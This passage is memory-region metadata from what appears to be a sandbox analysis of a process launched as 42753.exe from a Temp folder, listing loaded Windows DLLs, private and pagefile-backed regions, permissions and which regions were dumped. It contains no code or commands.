1245183, "entry_point": 0, "filename": null, "id": "region_938", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:56.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_939", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:56.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4300799, "entry_point": 4200000, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", "id": "region_940", "name": "42753.exe", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:56.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_941", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:56.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_942", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:56.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_943", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:56.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000944-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_156", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:56.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000945-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_945", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:56.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_946", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:56.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_947", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:56.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000948-addr_0x00000000002d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:00:56.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000949-addr_0x00000000005f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7274495, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:00:56.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1716224, "start_va": 1604255744, "type": "region", "version": 1 }, "end_va": 1605971967, "entry_point": 1604380693, "filename": "\\Windows\\System32\\esent.dll", "id": "region_950", "name": "esent.dll", "norm_filename": "c:\\windows\\system32\\esent.dll", "region_type": "memory_mapped_file", "start_va": 1604255744, "timestamp": "00:00:56.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_951", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:00:56.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_952", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:56.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_953", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:56.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_954", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:56.807", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_955", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:56.807", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_956", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:56.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_957", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:56.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_958", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:56.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1986461696, "type": "region", "version": 1 }, "end_va": 1986965503, "entry_point": 1986468590, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_959", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1986461696, "timestamp": "00:00:56.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_960", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:56.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_961", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:56.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_962", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:56.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_963", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:56.811", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_964", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:56.811", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_965", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:56.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_966", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:56.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_967", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:56.813", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000968-addr_0x00000000001b0000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_968", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:56.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_969", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:56.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3833855, "entry_point": 0, "filename": null, "id": "region_970", "name": "pagefile_0x00000000002e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3014656, "timestamp": "00:00:56.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_971", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:56.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_972", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:56.820", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000973-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_973", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:56.832", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000974-addr_0x0000000000270000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_974", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:56.833", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5378047, "entry_point": 0, "filename": null, "id": "region_975", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:56.833", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000976-addr_0x00000000005b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_976", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:00:56.833", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 19857407, "entry_point": 0, "filename": null, "id": "region_977", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:00:56.833", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000978-addr_0x0000000000280000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2695167, "entry_point": 0, "filename": null, "id": "region_978", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:56.835", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000979-addr_0x00000000002a0000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2805759, "entry_point": 0, "filename": null, "id": "region_979", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:00:56.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1906376704, "type": "region", "version": 1 }, "end_va": 1906737151, "entry_point": 1906381748, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_980", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1906376704, "timestamp": "00:00:57.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1906049024, "type": "region", "version": 1 }, "end_va": 1906372607, "entry_point": 1906054226, "filename": "\\Windows\\System32\\webio.dll", "id": "region_981", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1906049024, "timestamp": "00:00:57.007", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_982", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:00:57.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_983", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:00:57.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_984", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:00:57.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_985", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:57.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_986", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:57.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_987", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_988", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:57.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19857408, "type": "region", "version": 1 }, "end_va": 22802431, "entry_point": 19857408, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_989", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19857408, "timestamp": "00:00:57.173", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000990-addr_0x00000000002b0000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2871295, "entry_point": 0, "filename": null, "id": "region_990", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:00:57.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1957625856, "type": "region", "version": 1 }, "end_va": 1957720063, "entry_point": 1957633181, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_991", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1957625856, "timestamp": "00:00:58.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_992", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:58.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947729920, "type": "region", "version": 1 }, "end_va": 1947783167, "entry_point": 1947734496, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_993", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947729920, "timestamp": "00:00:58.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_994", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:58.989", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000995-addr_0x00000000015c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ 